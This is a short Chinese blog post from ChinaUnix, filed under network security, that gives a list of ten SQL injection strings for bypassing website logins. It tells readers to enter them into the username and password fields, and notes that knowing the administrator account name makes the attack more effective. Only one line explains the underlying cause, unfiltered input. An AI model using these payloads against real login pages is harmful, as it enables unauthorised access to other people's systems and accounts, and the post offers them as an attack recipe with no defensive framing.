Chinaunix首页 | 论坛 | 博客
  • 博客访问: 533705
  • 博文数量: 40
  • 博客积分: 6020
  • 博客等级: 准将
  • 技术积分: 1711
  • 用 户 组: 普通用户
  • 注册时间: 2005-09-20 18:49
文章分类

全部博文(40)

文章存档

2011年(10)

2010年(13)

2009年(12)

2008年(5)

分类: 网络与安全

2010-11-13 16:18:00

就是在用户名与密码处都写入下列字符,如果知道管理员帐号的话直接添帐号,效果会更好!

例如我们要利用第一条就是:

用户名:"or "a"="a

密码:"or "a"="a

*********************************************************

1:"or "a"="a
2: '.).or.('.a.'='.a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or.'a.'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'

原理都是利用SQL语法来利用注入,其实这也是注入的一种,都是因为提交字符未加过滤或过滤不严而导致的.

阅读(767) | 评论(0) | 转发(1) |
给主人留下些什么吧!~~